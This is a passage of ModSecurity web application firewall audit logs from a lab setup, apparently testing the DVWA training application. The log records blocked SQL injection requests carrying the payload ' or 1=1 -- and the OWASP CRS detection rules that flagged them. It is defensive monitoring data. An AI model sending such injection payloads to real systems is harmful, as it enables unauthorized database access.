80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0-X8AAQEAAAkZ0BkAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0-X8AAQEAAAkZ0BkAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0-X8AAQEAAAkZ0BkAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0-X8AAQEAAAkZ0BkAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0-X8AAQEAAAkZ0BkAAAAE\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":388,"p2":2109,"p3":0,"p4":0,"p5":143,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:32:05 --0400","transaction_id":"WRc1BX8AAQEAAAkVV4wAAAAA","remote_address":"192.168.75.145","remote_port":56806,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1BX8AAQEAAAkVV4wAAAAA\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1BX8AAQEAAAkVV4wAAAAA\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1BX8AAQEAAAkVV4wAAAAA\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1BX8AAQEAAAkVV4wAAAAA\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc1BX8AAQEAAAkVV4wAAAAA\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":661,"p2":3257,"p3":0,"p4":0,"p5":217,"sr":26,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:32:25 --0400","transaction_id":"WRc1GX8AAQEAAAmHBJcAAAAF","remote_address":"127.0.0.1","remote_port":42084,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:30:21 GMT","If-None-Match":"\"1d0-54f6a5695262a\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:32:22 GMT","ETag":"\"1f8-54f6a5dd13646\"","Accept-Ranges":"bytes","Content-Length":"504","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc1GX8AAQEAAAmHBJcAAAAF\"]"],"stopwatch":{"p1":652,"p2":1048,"p3":56,"p4":246,"p5":52,"sr":29,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:32:25 --0400","transaction_id":"WRc1GX8AAQEAAAmHBJgAAAAF","remote_address":"127.0.0.1","remote_port":42084,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc1GX8AAQEAAAmHBJgAAAAF\"]"],"stopwatch":{"p1":382,"p2":921,"p3":46,"p4":245,"p5":48,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:32:25 --0400","transaction_id":"WRc1GX8AAQEAAAmHBJkAAAAF","remote_address":"127.0.0.1","remote_port":42084,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc1GX8AAQEAAAmHBJkAAAAF\"]"],"stopwatch":{"p1":548,"p2":856,"p3":42,"p4":234,"p5":44,"sr":27,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:34:29 --0400","transaction_id":"WRc1lX8AAQEAAAkXs@gAAAAC","remote_address":"192.168.75.153","remote_port":39270,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"2701","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname 